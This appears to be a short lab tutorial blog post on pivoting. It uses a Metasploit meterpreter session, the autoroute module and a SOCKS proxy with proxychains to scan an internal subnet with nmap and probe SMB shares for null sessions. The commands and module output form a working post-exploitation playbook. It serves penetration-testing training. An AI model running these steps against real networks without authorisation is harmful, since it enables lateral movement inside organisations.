Pivoting: Metasploit(meterpreter)+Proxychains

n00🔑
3 min readFeb 24, 2021

This is just another pivoting tutorial(Nothing special). We will try to find other hosts in the internal network of a organization and will do basic enumeration on discovered hosts.

Prerequisite:

Already compromised host with meterpreter session.

  1. Let’s check available meterpreter sessions:
sessions -l

2. Using autoroute module to create a pivot for the other network i.e. 172.30.111.0/24 . After running this all the metasploit modules will be able to access internal network 172.30.111.0/24.

(Here in this lab scenario, we already know this subnet exists)

msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > set subnet 172.30.111.0/24
subnet => 172.30.111.0/24
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module.
[*] Running module against ELS-WIN7
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.130.40.0/255.255.255.0 from host's routing table.
[*] Post module execution completed

Note: Set “CMD” option to “add” if “autoadd” doesn’t work.

3. Then We will use auxiliary/server/socks_proxy to create a proxy server which will allow us to proxy all our traffic from tools like nmap, crackmapexec etc within the meterpreter session.

Note: proxychains by default uses port 9050. Can be configured here /etc/proxychains.conf or /etc/proxychains4.conf

use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
port => 9050
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
netstat -lntp

4. Now lets test our connection. We will try to find live hosts in network 172.30.111.0/24

Proxies don’t support ICMP(ICMP works on IP layer and proxy works on Transport layer and above) therefore we cannot use normal ping sweep. Rather we will do tcp connect port scan(-sT) for common ports to find live hosts or if you really want to do ping sweep then you can use post/multi/gather/ping_sweep

proxychains nmap 172.30.111.0/24 -sT -Pn -n --top-ports=10 --disable-arp-ping

This scan will be very slow, patience is required. for demonstration I already know 172.30.111.10 is alive and running smb so lets see results of this scan.

proxychains nmap 172.30.111.10 -sT -Pn -n -p445,139,135 --disable-arp-ping
  • sT(Tcp Connect scan)
  • Pn(assume host is live and skip icmp ping)
  • n(skip dns resolution)
  • disable-arp-ping(self explanatory)

We know smb is running on 445. Let’s check for common smb issues and we found null session.

wait for sometime…

proxychains nmap 172.30.111.10 -sT -Pn -n -p445,139,135 --disable-arp-ping --script smb-enum-shares
proxychains smbmap -H  172.30.111.10 -u null

Thanks for reading!

--

--